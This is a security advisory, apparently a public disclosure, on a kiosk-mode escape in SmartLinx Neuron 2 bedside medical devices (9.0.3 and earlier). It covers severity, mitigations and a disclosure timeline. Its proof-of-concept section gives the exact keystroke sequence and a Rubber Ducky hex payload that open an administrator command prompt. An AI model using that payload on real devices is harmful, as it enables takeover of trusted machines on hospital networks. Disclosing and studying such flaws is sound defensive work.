Capsule Technologies SmartLinx Neuron 2 restricted environment protection mechanism failure vulnerability

Summary

A restricted environment escape vulnerability exists in the “kiosk mode” function of Capsule Technologies SmartLinx Neuron 2 medical information collection devices running versions 9.0.3 or lower. A specific series of keyboard inputs can escape the restricted environment, resulting in full administrator access to the underlying operating system. An attacker can connect to the device via USB port with a keyboard or other HID device to trigger this vulnerability.

Tested Versions

Capsule Technologies SmartLinx Neuron 2 9.0.3 or lower.

Product URLs

<https://www.capsuletech.com/capsule&gt;

CVSSv3 Score

7.6 - CVSS:3.0/AV:P/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-693: Protection Mechanism Failure

Details

The Capsule Technologies SmartLinx Neuron 2 is a “bedside mobile clinical computer that enables the automatic collection of vital signs data. It features local data storage, and connects to the hospital network” and “is the core hardware component of Capsule™ medical device information system, according to the manufacturer.

The devices feature a restricted environment, commonly referred to as “kiosk mode,” to prevent a user from exiting the running applications and accessing the underlying operating system. It is possible to connect a USB keyboard or other HID device and, through a series of specific keystrokes, escape this restricted environment and access the Microsoft Windows operating system with full administrator permissions. This access could provide an attacker with full control of a trusted device on a hospital’s internal network.

Exploit Proof of Concept

Connect a USB keyboard to the device. Entering the following keystrokes will escape the restricted environment and open an operating system command prompt with administrator privileges.

ALT
DOWN 6 times
ENTER*
SHIFT 5 times
SHIFT-TAB
SPACE
SHIFT-TAB
SPACE
cmd.exe
ENTER

*may need to perform steps 1-3 two times

Alternatively, programming a USB Rubber Ducky with the following “duck code” will automatically yeild the same results as the above.

00000000: 00ff 00ff 00ff 00ff 00ff 00ff 00ff 00ff ................
00000010: 00ff 00ff 00ff 00c3 0204 00ff 00ff 00ff ................
00000020: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000030: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000040: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000050: 00ff 00ff 00eb 2800 0204 00ff 00ff 00ff ......(.........
00000060: 00eb 5100 5100 5100 5100 5100 5100 00ff ..Q.Q.Q.Q.Q.Q...
00000070: 00ff 00ff 00eb 2800 0202 0202 0202 0202 ......(.........
00000080: 0202 00ff 00ff 00ff 00eb 2b02 2c00 00ff ..........+.,...
00000090: 00ff 00ff 00eb 2b02 2c00 00ff 00ff 00ff ......+.,.......
000000a0: 00eb 0600 1000 0700 2800 ........(.

Mitigation

Apply vendor software updates, versions after 9.0.3 are not vulnerable. Devices running versions 10.x are not affected.

Restrict physical access to vulnerable devices and ensure they remain outside of the organization’s security perimeter. Ensure data or communications from said devices are not implicitly trusted by internal systems. If possible, physically disable or obstruct access to USB ports on vulnerable devices. Monitor logs for signs of connections of unauthorized peripherals to vulnerable devices.

Timeline

2019-02-26 - Vendor Disclosure
2019-02-28 - Vendor tested & confirmed does not reproduce on Version 10.1
2019-04-08 - Public Release
2020-08-14 - Vendor clarified that versions 9.0.3 or lower were affected and has issued a hotfix for those versions which can be downloaded from their customer portal.